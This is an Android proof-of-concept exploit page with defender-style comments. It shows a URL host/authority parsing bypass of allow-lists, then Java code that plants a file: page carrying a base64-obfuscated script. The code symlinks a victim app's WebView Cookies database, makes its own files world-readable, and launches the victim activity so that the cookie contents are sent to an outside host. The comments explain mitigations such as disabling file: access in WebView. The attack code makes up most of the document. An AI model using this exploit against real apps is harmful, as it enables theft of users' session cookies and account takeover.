Verify URI by Authority, not Host

// Host-vs-authority ambiguity: java.net.URL parses everything before the "@" as userinfo,
// so getHost() yields tw.buy.yahoo.com, while a WHATWG-style browser/WebView parser treats
// "\" as "/" and ends the host at fack.website. An allow-list check on getHost() alone can
// therefore pass for a URL the WebView navigates elsewhere. Compare scheme plus the full
// authority (URL#getAuthority()) against the allow-list instead. (The opening “ is a
// typographic quote left by page extraction; the line does not compile as shown.)
String url = “http://fack.website\\\\@tw.buy.yahoo.com/fashionbuy";

Theft of the cookie file via XSS

// Absolute paths of the two files this PoC writes under its own data directory; assigned in onCreate().
private String setCookieFile;
private String symlinkFile;

// Package and activity of the target app; the page leaves both as placeholders.
private static final String VICTIM_PACKAGE = ...;
private static final String VICTIM_ACTIVITY = ...;

/**
 * PoC entry point: writes two files into this app's data directory, makes that directory
 * world-readable, then starts the victim activity with a JSON extra whose "uri" is a
 * file: URL pointing at the first file.
 *
 * Defender's view: the uri value is "file://{your valid website}/data/data/<this app>/setCookie.html".
 * A check that only inspects the parsed host sees the allow-listed name, yet the scheme is
 * file: and the path is a local file. Validation on the victim side has to reject non-http(s)
 * schemes and compare the full scheme+authority, not the host alone, before anything reaches
 * a WebView.
 *
 * @param savedInstanceState passed straight through to super.onCreate()
 */
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);

// Both files live under /data/data/<own package> (see getRoot()).
setCookieFile = getRoot() + "/setCookie.html";
symlinkFile = getRoot() + "/symlink.html";

payloadFile();
symlink();
// setReadable(true, false) on the whole tree: this is what lets the victim's process open the files.
grantReadRecursive(new File(getRoot()));

Intent intent = new Intent();
intent.setClassName(VICTIM_PACKAGE, VICTIM_ACTIVITY);
// Premise of the page: the victim activity forwards this extra to an in-app WebView
// (that handling is not shown here — confirm against the target's intent parsing).
// The "/" -> "\/" replacement only JSON-escapes the path inside the extra.
intent.putExtra("intent_content", "{\"content\":{\"uri\":\"file:\\/\\/{your valid website}" + setCookieFile.replace("/", "\\/") + "\"}}");
startActivity(intent);
}

/**
 * Writes the first HTML page to {@code setCookieFile}: a script block that eval()s a
 * base64-encoded body, then after 45 s redirects the WebView to the second (symlink) file,
 * again via a file: URL with an attacker-chosen authority.
 *
 * Defender's view: a WebView that loaded a file: page and is then redirected to another
 * file: path is the pattern to look for; it only works when the victim WebView permits file
 * access (WebSettings.setAllowFileAccess / setAllowUniversalAccessFromFileURLs left enabled).
 *
 * Implementation notes: PrintWriter uses the platform default charset here, and close() sits
 * inside the try block, so it is skipped when an exception is thrown.
 *
 * @throws RuntimeException wrapping any exception raised while writing the file
 */
void payloadFile() {
try {
PrintWriter writer = new PrintWriter(new File(setCookieFile));
writer.println("<h1>this is theft</h1><script>"); writer.println("eval(atob('ZG9jdW1lbnQuY29va2llID0gInggPSA8aW1nIHNyYz1cInhcIiBvbmVycm9yPVwiZXZhbChhdG9iKCdkbUZ5SUdsdFp5QTlJR1J2WTNWdFpXNTBMbU55WldGMFpVVnNaVzFsYm5Rb0ltbHRaeUlwT3dwcGJXY3VjM0pqSUQwZ0ltaDBkSEE2THk5aVlYTmxOalF1Y25VdmQyOTNMbXB3Wno5NmFHczlJaUFySUdWdVkyOWtaVlZTU1VOdmJYQnZibVZ1ZENoa2IyTjFiV1Z1ZEM1blpYUkZiR1Z0Wlc1MGMwSjVWR0ZuVG1GdFpTZ2lhSFJ0YkNJcFd6QmRMbWx1Ym1WeVNGUk5UQ2s3JykpXCI+Ijs='));");
// 45 s delay before the second file is loaded.
writer.println("setTimeout(\"location.href='file://{valid url}" + symlinkFile + "'\", 45000);");
writer.println("</script>");
writer.close();
}
catch (Exception e) {
throw new RuntimeException(e);
}
}

/**
 * Replaces {@code symlinkFile} with a symbolic link to the victim app's WebView cookie
 * database, /data/data/<VICTIM_PACKAGE>/app_webview/Cookies, by shelling out to "ln -s".
 *
 * Defender's view: this app cannot read the victim's cookie file itself; the link only pays
 * off when a WebView running in the victim's process follows it from the file: page written
 * in payloadFile(). Never loading file: URLs taken from intent extras, and disabling file
 * access in WebSettings, closes that path regardless of what links exist on disk.
 *
 * @throws RuntimeException wrapping any exception from exec() or waitFor()
 */
void symlink() {
new File(symlinkFile).delete();
try {
// Exit status of ln is not checked; a pre-existing link is removed by the delete() above.
Runtime.getRuntime().exec("ln -s /data/data/" + VICTIM_PACKAGE + "/app_webview/Cookies " + symlinkFile).waitFor();
}
catch (Exception e) {
throw new RuntimeException(e);
}
}

/** Returns this app's own private data directory, /data/data/<own package name>. */
String getRoot() {
return "/data/data/" + getPackageName();
}

/**
 * Marks {@code dist} and, if it is a directory, everything below it as readable by every
 * user (setReadable(true, false) means ownerOnly = false), i.e. world-readable.
 *
 * Defender's view: this is the step that exposes the PoC files to another app's process.
 * An app should never relax permissions on its private data directory this way, and a
 * victim WebView without file: access cannot read world-readable files either.
 *
 * @param dist file or directory root whose permissions are changed
 */
private void grantReadRecursive(File dist) {
dist.setReadable(true, false);
if(dist.isDirectory()) {
for(File child : dist.listFiles()) {
grantReadRecursive(child);
}
}
}
